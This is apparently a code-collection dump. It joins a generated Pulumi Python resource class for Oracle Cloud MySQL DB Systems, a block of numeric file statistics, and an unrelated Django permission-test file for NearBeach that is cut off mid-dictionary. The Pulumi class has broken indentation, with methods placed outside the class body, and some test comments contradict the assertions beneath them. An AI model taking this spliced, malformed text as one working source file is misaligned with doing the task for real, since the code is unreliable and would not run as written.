        :param pulumi.Input[pulumi.InputType['MysqlDbSystemMaintenanceArgs']] maintenance: (Updatable) The Maintenance Policy for the DB System. `maintenance` and `backup_policy` cannot be updated in the same request.
        :param pulumi.Input[str] mysql_version: Name of the MySQL Version in use for the DB System.
        :param pulumi.Input[int] port: The port for primary endpoint of the DB System to listen on.
        :param pulumi.Input[int] port_x: The TCP network port on which X Plugin listens for connections. This is the X Plugin equivalent of port.
        :param pulumi.Input[str] shape_name: The name of the shape. The shape determines the resources allocated
               * CPU cores and memory for VM shapes; CPU cores, memory and storage for non-VM (or bare metal) shapes. To get a list of shapes, use the [ListShapes](https://docs.cloud.oracle.com/iaas/api/#/en/mysql/20190415/ShapeSummary/ListShapes) operation.
        :param pulumi.Input[str] shutdown_type: It is applicable only for stopping a DB System. Could be set to `FAST`, `SLOW` or `IMMEDIATE`. Default value is `FAST`.
        :param pulumi.Input[pulumi.InputType['MysqlDbSystemSourceArgs']] source: Parameters detailing how to provision the initial data of the system.
        :param pulumi.Input[str] state: (Updatable) The target state for the DB System. Could be set to `ACTIVE` or `INACTIVE`.
        :param pulumi.Input[str] subnet_id: The OCID of the subnet the DB System is associated with.
        """
        ...
    # Typing overload 2 of 2: construct the resource from a pre-built
    # MysqlDbSystemArgs object. Stub body only; see the dispatching __init__.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: MysqlDbSystemArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        This resource provides the Mysql Db System resource in Oracle Cloud Infrastructure MySQL Database service.

        Creates and launches a DB System.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_oci as oci

        test_mysql_db_system = oci.mysql.MysqlDbSystem("testMysqlDbSystem",
            admin_password=var["mysql_db_system_admin_password"],
            admin_username=var["mysql_db_system_admin_username"],
            availability_domain=var["mysql_db_system_availability_domain"],
            compartment_id=var["compartment_id"],
            shape_name=var["mysql_shape_name"],
            subnet_id=oci_core_subnet["test_subnet"]["id"],
            backup_policy=oci.mysql.MysqlDbSystemBackupPolicyArgs(
                defined_tags={
                    "foo-namespace.bar-key": "value",
                },
                freeform_tags={
                    "bar-key": "value",
                },
                is_enabled=var["mysql_db_system_backup_policy_is_enabled"],
                retention_in_days=var["mysql_db_system_backup_policy_retention_in_days"],
                window_start_time=var["mysql_db_system_backup_policy_window_start_time"],
            ),
            configuration_id=oci_audit_configuration["test_configuration"]["id"],
            data_storage_size_in_gb=var["mysql_db_system_data_storage_size_in_gb"],
            defined_tags={
                "foo-namespace.bar-key": "value",
            },
            description=var["mysql_db_system_description"],
            display_name=var["mysql_db_system_display_name"],
            fault_domain=var["mysql_db_system_fault_domain"],
            freeform_tags={
                "bar-key": "value",
            },
            hostname_label=var["mysql_db_system_hostname_label"],
            ip_address=var["mysql_db_system_ip_address"],
            is_highly_available=var["mysql_db_system_is_highly_available"],
            maintenance=oci.mysql.MysqlDbSystemMaintenanceArgs(
                window_start_time=var["mysql_db_system_maintenance_window_start_time"],
            ),
            port=var["mysql_db_system_port"],
            port_x=var["mysql_db_system_port_x"],
            source=oci.mysql.MysqlDbSystemSourceArgs(
                source_type=var["mysql_db_system_source_source_type"],
                backup_id=oci_mysql_mysql_backup["test_backup"]["id"],
            ))
        ```

        ## Import

        MysqlDbSystems can be imported using the `id`, e.g.

        ```sh
         $ pulumi import oci:mysql/mysqlDbSystem:MysqlDbSystem test_mysql_db_system "id"
        ```

        :param str resource_name: The name of the resource.
        :param MysqlDbSystemArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(MysqlDbSystemArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       admin_password: Optional[pulumi.Input[str]] = None,
                       admin_username: Optional[pulumi.Input[str]] = None,
                       availability_domain: Optional[pulumi.Input[str]] = None,
                       backup_policy: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemBackupPolicyArgs']]] = None,
                       compartment_id: Optional[pulumi.Input[str]] = None,
                       configuration_id: Optional[pulumi.Input[str]] = None,
                       data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
                       defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                       description: Optional[pulumi.Input[str]] = None,
                       display_name: Optional[pulumi.Input[str]] = None,
                       fault_domain: Optional[pulumi.Input[str]] = None,
                       freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                       hostname_label: Optional[pulumi.Input[str]] = None,
                       ip_address: Optional[pulumi.Input[str]] = None,
                       is_highly_available: Optional[pulumi.Input[bool]] = None,
                       maintenance: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemMaintenanceArgs']]] = None,
                       mysql_version: Optional[pulumi.Input[str]] = None,
                       port: Optional[pulumi.Input[int]] = None,
                       port_x: Optional[pulumi.Input[int]] = None,
                       shape_name: Optional[pulumi.Input[str]] = None,
                       shutdown_type: Optional[pulumi.Input[str]] = None,
                       source: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemSourceArgs']]] = None,
                       state: Optional[pulumi.Input[str]] = None,
                       subnet_id: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Shared implementation behind both __init__ overloads: validates
        # resource options, enforces required properties, builds the property
        # bag, and registers the resource with the Pulumi engine.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            # Pin the provider plugin version when the caller did not specify one.
            opts.version = _utilities.get_version()
        if opts.id is None:
            # No opts.id means we are creating a new resource, so the property
            # bag must be built here from the constructor arguments.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = MysqlDbSystemArgs.__new__(MysqlDbSystemArgs)

            # Required properties are only enforced for a fresh create; a
            # lookup by URN (opts.urn set) skips these checks.
            if admin_password is None and not opts.urn:
                raise TypeError("Missing required property 'admin_password'")
            __props__.__dict__["admin_password"] = admin_password
            if admin_username is None and not opts.urn:
                raise TypeError("Missing required property 'admin_username'")
            __props__.__dict__["admin_username"] = admin_username
            if availability_domain is None and not opts.urn:
                raise TypeError("Missing required property 'availability_domain'")
            __props__.__dict__["availability_domain"] = availability_domain
            __props__.__dict__["backup_policy"] = backup_policy
            if compartment_id is None and not opts.urn:
                raise TypeError("Missing required property 'compartment_id'")
            __props__.__dict__["compartment_id"] = compartment_id
            __props__.__dict__["configuration_id"] = configuration_id
            __props__.__dict__["data_storage_size_in_gb"] = data_storage_size_in_gb
            __props__.__dict__["defined_tags"] = defined_tags
            __props__.__dict__["description"] = description
            __props__.__dict__["display_name"] = display_name
            __props__.__dict__["fault_domain"] = fault_domain
            __props__.__dict__["freeform_tags"] = freeform_tags
            __props__.__dict__["hostname_label"] = hostname_label
            __props__.__dict__["ip_address"] = ip_address
            __props__.__dict__["is_highly_available"] = is_highly_available
            __props__.__dict__["maintenance"] = maintenance
            # mysql_version is deprecated: warn (both Python-level and via the
            # Pulumi log) whenever the caller sets it on a fresh create.
            if mysql_version is not None and not opts.urn:
                warnings.warn("""The 'mysql_version' field has been deprecated and may be removed in a future version. Do not use this field.""", DeprecationWarning)
                pulumi.log.warn("""mysql_version is deprecated: The 'mysql_version' field has been deprecated and may be removed in a future version. Do not use this field.""")
            __props__.__dict__["mysql_version"] = mysql_version
            __props__.__dict__["port"] = port
            __props__.__dict__["port_x"] = port_x
            if shape_name is None and not opts.urn:
                raise TypeError("Missing required property 'shape_name'")
            __props__.__dict__["shape_name"] = shape_name
            __props__.__dict__["shutdown_type"] = shutdown_type
            __props__.__dict__["source"] = source
            __props__.__dict__["state"] = state
            if subnet_id is None and not opts.urn:
                raise TypeError("Missing required property 'subnet_id'")
            __props__.__dict__["subnet_id"] = subnet_id

            # Output-only properties: initialized to None and populated by the
            # provider after the resource is created.
            __props__.__dict__["analytics_cluster"] = None
            __props__.__dict__["channels"] = None
            __props__.__dict__["current_placement"] = None
            __props__.__dict__["endpoints"] = None
            __props__.__dict__["heat_wave_cluster"] = None
            __props__.__dict__["is_analytics_cluster_attached"] = None
            __props__.__dict__["is_heat_wave_cluster_attached"] = None
            __props__.__dict__["lifecycle_details"] = None
            __props__.__dict__["time_created"] = None
            __props__.__dict__["time_updated"] = None
        super(MysqlDbSystem, __self__).__init__(
            'oci:mysql/mysqlDbSystem:MysqlDbSystem',
            resource_name,
            __props__,
            opts)
@staticmethod
def get(resource_name: str,
        id: pulumi.Input[str],
        opts: Optional[pulumi.ResourceOptions] = None,
        admin_password: Optional[pulumi.Input[str]] = None,
        admin_username: Optional[pulumi.Input[str]] = None,
        analytics_cluster: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemAnalyticsClusterArgs']]] = None,
        availability_domain: Optional[pulumi.Input[str]] = None,
        backup_policy: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemBackupPolicyArgs']]] = None,
        channels: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MysqlDbSystemChannelArgs']]]]] = None,
        compartment_id: Optional[pulumi.Input[str]] = None,
        configuration_id: Optional[pulumi.Input[str]] = None,
        current_placement: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemCurrentPlacementArgs']]] = None,
        data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
        defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
        description: Optional[pulumi.Input[str]] = None,
        display_name: Optional[pulumi.Input[str]] = None,
        endpoints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MysqlDbSystemEndpointArgs']]]]] = None,
        fault_domain: Optional[pulumi.Input[str]] = None,
        freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
        heat_wave_cluster: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemHeatWaveClusterArgs']]] = None,
        hostname_label: Optional[pulumi.Input[str]] = None,
        ip_address: Optional[pulumi.Input[str]] = None,
        is_analytics_cluster_attached: Optional[pulumi.Input[bool]] = None,
        is_heat_wave_cluster_attached: Optional[pulumi.Input[bool]] = None,
        is_highly_available: Optional[pulumi.Input[bool]] = None,
        lifecycle_details: Optional[pulumi.Input[str]] = None,
        maintenance: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemMaintenanceArgs']]] = None,
        mysql_version: Optional[pulumi.Input[str]] = None,
        port: Optional[pulumi.Input[int]] = None,
        port_x: Optional[pulumi.Input[int]] = None,
        shape_name: Optional[pulumi.Input[str]] = None,
        shutdown_type: Optional[pulumi.Input[str]] = None,
        source: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemSourceArgs']]] = None,
        state: Optional[pulumi.Input[str]] = None,
        subnet_id: Optional[pulumi.Input[str]] = None,
        time_created: Optional[pulumi.Input[str]] = None,
        time_updated: Optional[pulumi.Input[str]] = None) -> 'MysqlDbSystem':
    """
    Get an existing MysqlDbSystem resource's state with the given name, id, and optional extra
    properties used to qualify the lookup.

    :param str resource_name: The unique name of the resulting resource.
    :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
    :param pulumi.ResourceOptions opts: Options for the resource.

    Every remaining keyword argument overrides the corresponding state
    property; each one is documented on the matching property getter of
    this class.
    """
    opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
    # Bypass __init__ of the state class: we only want a bare carrier object
    # whose __dict__ we populate directly.
    __props__ = _MysqlDbSystemState.__new__(_MysqlDbSystemState)
    # Insertion order of this dict matches the original one-assignment-per-
    # property sequence, so the populated state is identical.
    state_values = {
        "admin_password": admin_password,
        "admin_username": admin_username,
        "analytics_cluster": analytics_cluster,
        "availability_domain": availability_domain,
        "backup_policy": backup_policy,
        "channels": channels,
        "compartment_id": compartment_id,
        "configuration_id": configuration_id,
        "current_placement": current_placement,
        "data_storage_size_in_gb": data_storage_size_in_gb,
        "defined_tags": defined_tags,
        "description": description,
        "display_name": display_name,
        "endpoints": endpoints,
        "fault_domain": fault_domain,
        "freeform_tags": freeform_tags,
        "heat_wave_cluster": heat_wave_cluster,
        "hostname_label": hostname_label,
        "ip_address": ip_address,
        "is_analytics_cluster_attached": is_analytics_cluster_attached,
        "is_heat_wave_cluster_attached": is_heat_wave_cluster_attached,
        "is_highly_available": is_highly_available,
        "lifecycle_details": lifecycle_details,
        "maintenance": maintenance,
        "mysql_version": mysql_version,
        "port": port,
        "port_x": port_x,
        "shape_name": shape_name,
        "shutdown_type": shutdown_type,
        "source": source,
        "state": state,
        "subnet_id": subnet_id,
        "time_created": time_created,
        "time_updated": time_updated,
    }
    for prop_name, prop_value in state_values.items():
        __props__.__dict__[prop_name] = prop_value
    return MysqlDbSystem(resource_name, opts=opts, __props__=__props__)
# ---- Resource output properties -------------------------------------------
# Each getter below maps a snake_case Python attribute to its camelCase
# Pulumi property name (via @pulumi.getter) and reads the live value with
# pulumi.get(). These are generated accessors; the docstrings carry the
# provider's own property descriptions.
@property
@pulumi.getter(name="adminPassword")
def admin_password(self) -> pulumi.Output[str]:
    """
    The password for the administrative user. The password must be between 8 and 32 characters long, and must contain at least 1 numeric character, 1 lowercase character, 1 uppercase character, and 1 special (nonalphanumeric) character.
    """
    return pulumi.get(self, "admin_password")

@property
@pulumi.getter(name="adminUsername")
def admin_username(self) -> pulumi.Output[str]:
    """
    The username for the administrative user.
    """
    return pulumi.get(self, "admin_username")

# Deprecated accessor kept for backward compatibility (see docstring).
@property
@pulumi.getter(name="analyticsCluster")
def analytics_cluster(self) -> pulumi.Output['outputs.MysqlDbSystemAnalyticsCluster']:
    """
    DEPRECATED -- please use HeatWave API instead. A summary of an Analytics Cluster.
    """
    return pulumi.get(self, "analytics_cluster")

@property
@pulumi.getter(name="availabilityDomain")
def availability_domain(self) -> pulumi.Output[str]:
    """
    The availability domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
    """
    return pulumi.get(self, "availability_domain")

@property
@pulumi.getter(name="backupPolicy")
def backup_policy(self) -> pulumi.Output['outputs.MysqlDbSystemBackupPolicy']:
    """
    (Updatable) Backup policy as optionally used for DB System Creation.
    """
    return pulumi.get(self, "backup_policy")

@property
@pulumi.getter
def channels(self) -> pulumi.Output[Sequence['outputs.MysqlDbSystemChannel']]:
    """
    A list with a summary of all the Channels attached to the DB System.
    """
    return pulumi.get(self, "channels")

@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
    """
    The OCID of the compartment.
    """
    return pulumi.get(self, "compartment_id")

@property
@pulumi.getter(name="configurationId")
def configuration_id(self) -> pulumi.Output[str]:
    """
    The OCID of the Configuration to be used for this DB System.
    """
    return pulumi.get(self, "configuration_id")

@property
@pulumi.getter(name="currentPlacement")
def current_placement(self) -> pulumi.Output['outputs.MysqlDbSystemCurrentPlacement']:
    """
    The availability domain and fault domain a DB System is placed in.
    """
    return pulumi.get(self, "current_placement")

@property
@pulumi.getter(name="dataStorageSizeInGb")
def data_storage_size_in_gb(self) -> pulumi.Output[int]:
    """
    Initial size of the data volume in GBs that will be created and attached. Keep in mind that this only specifies the size of the database data volume, the log volume for the database will be scaled appropriately with its shape. It is required if you are creating a new database. It cannot be set if you are creating a database from a backup.
    """
    return pulumi.get(self, "data_storage_size_in_gb")

@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
    """
    (Updatable) Usage of predefined tag keys. These predefined keys are scoped to namespaces. Example: `{"foo-namespace.bar-key": "value"}`
    """
    return pulumi.get(self, "defined_tags")

@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
    """
    (Updatable) User-provided data about the DB System.
    """
    return pulumi.get(self, "description")

@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
    """
    (Updatable) The user-friendly name for the DB System. It does not have to be unique.
    """
    return pulumi.get(self, "display_name")

@property
@pulumi.getter
def endpoints(self) -> pulumi.Output[Sequence['outputs.MysqlDbSystemEndpoint']]:
    """
    The network endpoints available for this DB System.
    """
    return pulumi.get(self, "endpoints")

@property
@pulumi.getter(name="faultDomain")
def fault_domain(self) -> pulumi.Output[str]:
    """
    The fault domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
    """
    return pulumi.get(self, "fault_domain")

@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
    """
    (Updatable) Simple key-value pair applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
    """
    return pulumi.get(self, "freeform_tags")

@property
@pulumi.getter(name="heatWaveCluster")
def heat_wave_cluster(self) -> pulumi.Output['outputs.MysqlDbSystemHeatWaveCluster']:
    """
    A summary of a HeatWave cluster.
    """
    return pulumi.get(self, "heat_wave_cluster")

@property
@pulumi.getter(name="hostnameLabel")
def hostname_label(self) -> pulumi.Output[str]:
    """
    The hostname for the primary endpoint of the DB System. Used for DNS.
    """
    return pulumi.get(self, "hostname_label")

@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> pulumi.Output[str]:
    """
    The IP address the DB System is configured to listen on. A private IP address of your choice to assign to the primary endpoint of the DB System. Must be an available IP address within the subnet's CIDR. If you don't specify a value, Oracle automatically assigns a private IP address from the subnet. This should be a "dotted-quad" style IPv4 address.
    """
    return pulumi.get(self, "ip_address")

# Deprecated accessor kept for backward compatibility (see docstring).
@property
@pulumi.getter(name="isAnalyticsClusterAttached")
def is_analytics_cluster_attached(self) -> pulumi.Output[bool]:
    """
    DEPRECATED -- please use `isHeatWaveClusterAttached` instead. If the DB System has an Analytics Cluster attached.
    """
    return pulumi.get(self, "is_analytics_cluster_attached")

@property
@pulumi.getter(name="isHeatWaveClusterAttached")
def is_heat_wave_cluster_attached(self) -> pulumi.Output[bool]:
    """
    If the DB System has a HeatWave Cluster attached.
    """
    return pulumi.get(self, "is_heat_wave_cluster_attached")

@property
@pulumi.getter(name="isHighlyAvailable")
def is_highly_available(self) -> pulumi.Output[bool]:
    """
    (Updatable) Specifies if the DB System is highly available.
    """
    return pulumi.get(self, "is_highly_available")

@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> pulumi.Output[str]:
    """
    Additional information about the current lifecycleState.
    """
    return pulumi.get(self, "lifecycle_details")

@property
@pulumi.getter
def maintenance(self) -> pulumi.Output['outputs.MysqlDbSystemMaintenance']:
    """
    (Updatable) The Maintenance Policy for the DB System. `maintenance` and `backup_policy` cannot be updated in the same request.
    """
    return pulumi.get(self, "maintenance")

@property
@pulumi.getter(name="mysqlVersion")
def mysql_version(self) -> pulumi.Output[str]:
    """
    Name of the MySQL Version in use for the DB System.
    """
    return pulumi.get(self, "mysql_version")

@property
@pulumi.getter
def port(self) -> pulumi.Output[int]:
    """
    The port for primary endpoint of the DB System to listen on.
    """
    return pulumi.get(self, "port")

@property
@pulumi.getter(name="portX")
def port_x(self) -> pulumi.Output[int]:
    """
    The TCP network port on which X Plugin listens for connections. This is the X Plugin equivalent of port.
    """
    return pulumi.get(self, "port_x")

@property
@pulumi.getter(name="shapeName")
def shape_name(self) -> pulumi.Output[str]:
    """
    The name of the shape. The shape determines the resources allocated
    * CPU cores and memory for VM shapes; CPU cores, memory and storage for non-VM (or bare metal) shapes. To get a list of shapes, use the [ListShapes](https://docs.cloud.oracle.com/iaas/api/#/en/mysql/20190415/ShapeSummary/ListShapes) operation.
    """
    return pulumi.get(self, "shape_name")

@property
@pulumi.getter(name="shutdownType")
def shutdown_type(self) -> pulumi.Output[Optional[str]]:
    """
    It is applicable only for stopping a DB System. Could be set to `FAST`, `SLOW` or `IMMEDIATE`. Default value is `FAST`.
    """
    return pulumi.get(self, "shutdown_type")

@property
@pulumi.getter
def source(self) -> pulumi.Output['outputs.MysqlDbSystemSource']:
    """
    Parameters detailing how to provision the initial data of the system.
    """
    return pulumi.get(self, "source")

@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
    """
    (Updatable) The target state for the DB System. Could be set to `ACTIVE` or `INACTIVE`.
    """
    return pulumi.get(self, "state")

@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> pulumi.Output[str]:
    """
    The OCID of the subnet the DB System is associated with.
    """
    return pulumi.get(self, "subnet_id")

@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
    """
    The date and time the DB System was created.
    """
    return pulumi.get(self, "time_created")

@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> pulumi.Output[str]:
    """
    The time the DB System was last updated.
    """
    return pulumi.get(self, "time_updated")
| 52.822532
| 398
| 0.673799
| 10,737
| 87,210
| 5.271305
| 0.037254
| 0.075409
| 0.079897
| 0.050143
| 0.946023
| 0.927789
| 0.913018
| 0.894731
| 0.884466
| 0.858264
| 0
| 0.001676
| 0.226992
| 87,210
| 1,650
| 399
| 52.854545
| 0.837882
| 0.387387
| 0
| 0.769149
| 1
| 0.006383
| 0.150031
| 0.046285
| 0
| 0
| 0
| 0
| 0
| 1
| 0.167021
| false
| 0.029787
| 0.007447
| 0
| 0.276596
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b8ad984c14225235db0101678fc68a00b63c1abf
| 11,096
|
py
|
Python
|
NearBeach/tests/tests_user_permissions/test_admin_only.py
|
raulrusu88/NearBeach
|
e65c8c27aa3969ac6f56a2f970776994a65771b5
|
[
"MIT"
] | 94
|
2017-02-11T01:06:21.000Z
|
2022-03-04T06:17:22.000Z
|
NearBeach/tests/tests_user_permissions/test_admin_only.py
|
raulrusu88/NearBeach
|
e65c8c27aa3969ac6f56a2f970776994a65771b5
|
[
"MIT"
] | 37
|
2017-02-21T12:07:57.000Z
|
2022-02-23T10:45:20.000Z
|
NearBeach/tests/tests_user_permissions/test_admin_only.py
|
raulrusu88/NearBeach
|
e65c8c27aa3969ac6f56a2f970776994a65771b5
|
[
"MIT"
] | 26
|
2018-09-11T00:33:21.000Z
|
2022-02-09T10:38:07.000Z
|
from django.contrib.auth.models import User
from django.test import TestCase, Client
from django.urls import reverse
# Declaration of Username and Password
# Shared login credentials used by every test class below via login_user().
# Presumably this account is seeded by the NearBeach_basic_setup.json
# fixture as a superuser — TODO confirm against the fixture contents.
username = 'admin'
password = 'Test1234$'
def login_user(c: Client, self: TestCase) -> None:
    """Log the test case's stored credentials in through test client *c*.

    Posts ``self.credentials`` to the 'login' view (following redirects) and
    asserts that the resulting session belongs to an active user, so every
    caller starts from an authenticated state.

    :param c: the django test Client to authenticate.
    :param self: the running TestCase; must have ``self.credentials`` set
        (each class's setUp does this).
    """
    response = c.post(
        reverse('login'),
        self.credentials,
        follow=True,
    )
    # A successful login leaves an active user on the response context.
    self.assertTrue(response.context['user'].is_active)
class CustomerPermissionTest(TestCase):
    """Customer views exercised as the 'admin' user."""
    # Baseline data (users, customers, organisations) loaded before each test.
    fixtures = ['NearBeach_basic_setup.json']

    def setUp(self):
        # Credentials consumed by login_user() via self.credentials.
        self.credentials = {
            'username': username,
            'password': password
        }

    def test_customer_permissions(self):
        c = Client()

        # User will be logged in
        login_user(c, self)

        # Go to an existing customer -> user should have access
        response = c.get(reverse('customer_information', args=['1']))
        self.assertEqual(response.status_code, 200)

    def test_customer_save_permissions(self):
        c = Client()

        # User will be logged in
        login_user(c, self)

        # Send a POST request to new_customer -> user should NOT be able to save
        # NOTE(review): despite the comment above, 200 is asserted — in this
        # admin-only suite the admin presumably IS allowed to save, or the view
        # reports failure in-page; confirm which and fix the comment.
        response = c.post(
            reverse('customer_information_save', args=['1']),
            data={
                'customer_title': 1,
                'customer_first_name': 'NearBeach',
                'customer_last_name': 'Support',
                'customer_email': 'support@nearbeach.org',
                'organisation': 1,
            },
        )
        self.assertEqual(response.status_code, 200)

    def test_new_customer_permission(self):
        c = Client()

        # user will be logged in
        login_user(c, self)

        # Go to create a new customer -> user should NOT have access
        # NOTE(review): comment conflicts with the 200 assertion — likely
        # copy-pasted from a restricted-user suite; verify intent.
        response = c.get(reverse('new_customer'))
        self.assertEqual(response.status_code, 200)
class KanbanPermissionTest(TestCase):
    """Kanban board views exercised as the 'admin' user."""
    fixtures = ['NearBeach_basic_setup.json']

    def setUp(self):
        # Credentials consumed by login_user() via self.credentials.
        self.credentials = {
            'username': username,
            'password': password
        }

    def test_kanban_information(self):
        c = Client()

        # user will be logged in
        login_user(c, self)

        # Go to an existing kanban board
        response = c.get(reverse('kanban_information', args=['1']))
        self.assertEqual(response.status_code, 200)

        # Go to an existing kanban board where user is not in group -> permission denied
        # NOTE(review): 200 is asserted, not 403 — as admin the user likely
        # bypasses group checks; the comment appears copied from a
        # restricted-user variant of this test. Confirm.
        response = c.get(reverse('kanban_information', args=['2']))
        self.assertEqual(response.status_code, 200)
class OrganisationPermissionTest(TestCase):
    """Placeholder for organisation-view permission tests (no tests yet)."""
    fixtures = ['NearBeach_basic_setup.json']

    def setUp(self):
        # Credentials consumed by login_user() via self.credentials.
        self.credentials = {
            'username': username,
            'password': password
        }
class ProjectPermissionTest(TestCase):
    """Project and task views exercised as the 'admin' user."""
    fixtures = ['NearBeach_basic_setup.json']

    def setUp(self):
        # Credentials consumed by login_user() via self.credentials.
        self.credentials = {
            'username': username,
            'password': password
        }

    def test_project_permissions(self):
        c = Client()

        # User will be logged in
        login_user(c, self)

        # Make sure the admin user can open up the project
        response = c.get(reverse('project_information', args=['1']))
        self.assertEqual(response.status_code, 200)

        # Make sure the admin user can open up the task
        response = c.get(reverse('task_information', args=['2']))
        self.assertEqual(response.status_code, 200)
class RFCPermissionTest(TestCase):
    """Placeholder for request-for-change permission tests (no tests yet)."""
    fixtures = ['NearBeach_basic_setup.json']

    def setUp(self):
        # Credentials consumed by login_user() via self.credentials.
        self.credentials = {
            'username': username,
            'password': password
        }
class RequirementPermissionTest(TestCase):
    """Placeholder for requirement permission tests (no tests yet)."""
    fixtures = ['NearBeach_basic_setup.json']

    def setUp(self):
        # Credentials consumed by login_user() via self.credentials.
        self.credentials = {
            'username': username,
            'password': password
        }
class RequirementItemPermissionTest(TestCase):
    """Placeholder for requirement-item permission tests (no tests yet)."""
    fixtures = ['NearBeach_basic_setup.json']

    def setUp(self):
        # Credentials consumed by login_user() via self.credentials.
        self.credentials = {
            'username': username,
            'password': password
        }
class TaskPermissionTest(TestCase):
    """Task views exercised as the 'admin' user."""
    fixtures = ['NearBeach_basic_setup.json']

    def setUp(self):
        # Credentials consumed by login_user() via self.credentials.
        self.credentials = {
            'username': username,
            'password': password
        }

    def test_task_permissions(self):
        c = Client()

        # User will be logged in
        login_user(c, self)

        # Make sure the admin user can open up the task
        response = c.get(reverse('task_information', args=['1']))
        self.assertEqual(response.status_code, 200)

        # Make sure the admin user can open up the project
        # NOTE(review): this hits 'task_information' again, not
        # 'project_information' as the comment (and the parallel test in
        # ProjectPermissionTest) suggests — probably a copy-paste slip.
        # Confirm which view was intended before changing.
        response = c.get(reverse('task_information', args=['2']))
        self.assertEqual(response.status_code, 200)
class AdministrationTest(TestCase):
    """User-administration views (search/new/edit user) exercised as 'admin'."""
    fixtures = ['NearBeach_basic_setup.json']

    def setUp(self):
        # Credentials consumed by login_user() via self.credentials.
        self.credentials = {
            'username': username,
            'password': password
        }

    def test_search_users(self):
        c = Client()

        # User will be logged in
        login_user(c, self)

        # Make sure the admin user can go to the /search/users panel
        response = c.get(reverse('search_user'))
        self.assertEqual(response.status_code, 200)

        # Send data to the backend
        response = c.post(
            reverse('search_user'),
            {'search': 'project'}
        )
        self.assertEqual(response.status_code, 200)

    def test_admin_user_information(self):
        c = Client()

        # User will be logged in
        login_user(c, self)

        # Make sure the admin user can go to the user/1
        response = c.get(reverse('user_information', args=[2]))
        self.assertEqual(response.status_code, 200)

        # Make sure the admin user can save information
        response = c.post(
            reverse('user_information_save', args=[2]),
            {
                'first_name': 'Team',
                'last_name': 'Leader',
                'email': 'support@nearbeach.org',
                'is_active': True,
                'is_superuser': False,
            }
        )
        self.assertEqual(response.status_code, 200)

    def test_bad_user_information_forms(self):
        c = Client()

        # User will be logged in
        login_user(c, self)

        # Make sure the admin user can go to the user/1
        # (response intentionally unused; this only primes the page)
        _ = c.get(reverse('user_information', args=[2]))

        # TODO(review): the bad-form submissions (blank first name, blank last
        # name, blank email, blank passwords) that previously lived here were
        # disabled — presumably because the backend does not yet return
        # HTTP 400 for them. Re-add them one by one once user_information_save
        # validates its form input.

    def test_admin_new_user(self):
        c = Client()

        # User will be logged in
        login_user(c, self)

        # Make sure the admin user can go to the new_user
        response = c.get(reverse('new_user'))
        self.assertEqual(response.status_code, 200)

        # Make sure the admin user can submit a new user
        response = c.post(
            reverse('new_user_save'),
            {
                'username': 'random_user',
                'first_name': 'First',
                'last_name': 'Name',
                'email': 'support@nearbeach.org',
                'password1': 'Test1234$',
                'password2': 'Test1234$'
            }
        )
        self.assertEqual(response.status_code, 200)

    def test_bad_new_user_forms(self):
        c = Client()

        # User will be logged in
        login_user(c, self)

        # Make sure the admin user can go to the user/1
        # (response intentionally unused; this only primes the page)
        _ = c.get(reverse('user_information', args=[2]))

        # The following tests will make sure the user can't submit bad forms
        # Blank Username -> backend must reject with 400
        response = c.post(
            reverse('new_user_save'),
            {
                'username': '',
                'first_name': 'First',
                'last_name': 'Name',
                'email': 'support@nearbeach.org',
